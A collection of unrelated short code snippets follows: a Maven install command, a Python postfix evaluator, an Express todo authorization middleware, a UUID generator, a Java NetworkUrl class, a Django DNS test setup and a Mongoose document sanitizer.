mvn -q install:install-file -DgroupId=com.android.support -DartifactId=support-v4 \
-Dversion=19.0.1 -Dpackaging=jar -Dfile="$jarLocation"
echo "Done!"
|
class PostfixEvaluator:
# Initialize the stack
def __init__(self):
self.stack = []
# Method to evaluate the expression
def evaluate(self, expression):
# Iterate over the expression
for char in expression:
# Push the number onto the stack
if char.isdigit():
self.stack.append(int(char))
# Perform the operation
else:
op1 = self.stack.pop()
op2 = self.stack.pop()
result = 0
# Select the operation based on the operator
if char == '+':
result = op2 + op1
elif char == '-':
result = op2 - op1
elif char == '*':
result = op2 * op1
elif char == '/':
result = op2 / op1
# Push the result back on the stack
self.stack.append(result)
# Return the value at the top of the stack
return self.stack.pop() |
<gh_stars>0
'use strict'
const { Todo } = require('../models')
module.exports = {
authorization (req, res, next) {
Todo.findOne({ _id: req.params.id, UserId: req.decoded.id })
.then((todo) => {
if (todo) {
if (String(todo.UserId) === String(req.decoded.id)) {
next()
} else {
next({ status: 401, message: 'Unauthorized process!' })
}
} else {
next({ status: 404, message: 'Todo is not found' })
}
}).catch(next)
}
}
|
import uuid
def create_unique_key():
return uuid.uuid4().hex
key = create_unique_key()
print(key)
#Output: d6e4ee62ac7f436fb6d25ec40f7db1f6 |
public class NetworkUrl {
private String url;
private String host;
private Integer port;
public NetworkUrl(String url, String host, Integer port) {
this.url = url;
this.host = host;
this.port = port;
}
public String getUrl() {
return url;
}
public String getHost() {
return host; // Complete implementation to return the host
}
public Integer getPort() {
return port; // Complete implementation to return the port
} |
<filename>cyder/cydns/domain/tests/basedomain.py
from django.test import TestCase
from cyder.core.ctnr.models import Ctnr
from cyder.cydhcp.constants import STATIC
from cyder.cydhcp.network.models import Network
from cyder.cydhcp.range.models import Range
from cyder.cydns.domain.models import Domain
from cyder.cydns.tests.utils import DNSTest, make_root
class BaseDomain(DNSTest):
def setUp(self):
super(BaseDomain, self).setUp()
Domain.objects.create(name="128.in-addr.arpa")
self.f_c = Domain.create_recursive(name='foo.poo')
make_root(self.f_c)
self.net = Network.objects.create(network_str='10.2.3.0/29')
self.sr = Range.objects.create(
network=self.net, range_type=STATIC, start_str='10.2.3.1',
end_str='10.2.3.4')
|
module.exports = function(document) {
document = document.toObject && document.toObject() || document
document.id = document._id.toString()
typeof document._id !== 'undefined' && delete document._id
typeof document.__v !== 'undefined' && delete document.__v
typeof document.password !== 'undefined' && delete document.password
typeof document.verificationCode !== 'undefined' && delete document.verificationCode
typeof document.verifyed !== 'undefined' && delete document.verifyed
return document
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.